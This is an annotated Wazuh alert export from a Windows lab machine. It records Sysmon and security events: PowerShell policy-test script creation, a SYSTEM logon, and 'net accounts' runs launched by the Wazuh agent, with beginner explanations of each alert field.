data.win.eventdata.image: C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\SystemTemp\\__PSScriptPolicyTest_4x1dyjil.bnk.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:41:58.962 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell process created an executable file in Windows root folder Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92205 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534526.2228926 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:42:04.2531417Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 288648 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:42:04.251
ProcessGuid: {94294ddc-be36-680a-0f0c-000000000e00}
ProcessId: 10392
Image: C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Windows\SystemTemp\__PSScriptPolicyTest_ux5z0ejr.gmd.ps1
CreationUtcTime: 2025-04-24 22:42:04.251
User: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:42:04.251 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be36-680a-0f0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10392 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Windows\\SystemTemp\\__PSScriptPolicyTest_ux5z0ejr.gmd.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:42:04.251 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534530.2231631 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:42:06.6692041Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43899 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 888 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 17 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534551.2238966 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:42:29.2811340Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 289977 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:42:29.257
ProcessGuid: {94294ddc-be55-680a-1a0c-000000000e00}
ProcessId: 664
Image: C:\Windows\SysWOW64\net.exe
FileVersion: 10.0.26100.1882 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net.exe
CommandLine: net.exe accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00}
ParentProcessId: 3244
ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:42:29.257 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be55-680a-1a0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 664 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1882 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: net.exe accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3244 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 18 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534558.2244195 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:42:36.4109022Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 290252 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:42:36.261
ProcessGuid: {94294ddc-be5c-680a-1c0c-000000000e00}
ProcessId: 11144
Image: C:\Windows\SysWOW64\net1.exe
FileVersion: 10.0.26100.1 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net1.exe
CommandLine: C:\WINDOWS\system32\net1 accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
ParentProcessGuid: {94294ddc-be55-680a-1a0c-000000000e00}
ParentProcessId: 664
ParentImage: C:\Windows\SysWOW64\net.exe
ParentCommandLine: net.exe accounts
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:42:36.261 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be5c-680a-1c0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11144 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\net1 accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-be55-680a-1a0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 664 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: net.exe accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 19 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534559.2249246 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:42:37.0200822Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 290311 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:42:37.010
ProcessGuid: {94294ddc-be5d-680a-1d0c-000000000e00}
ProcessId: 16636
Image: C:\Windows\SysWOW64\net.exe
FileVersion: 10.0.26100.1882 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net.exe
CommandLine: net.exe accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00}
ParentProcessId: 3244
ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:42:37.010 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-be5d-680a-1d0c-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16636 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1882 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: net.exe accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3244 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
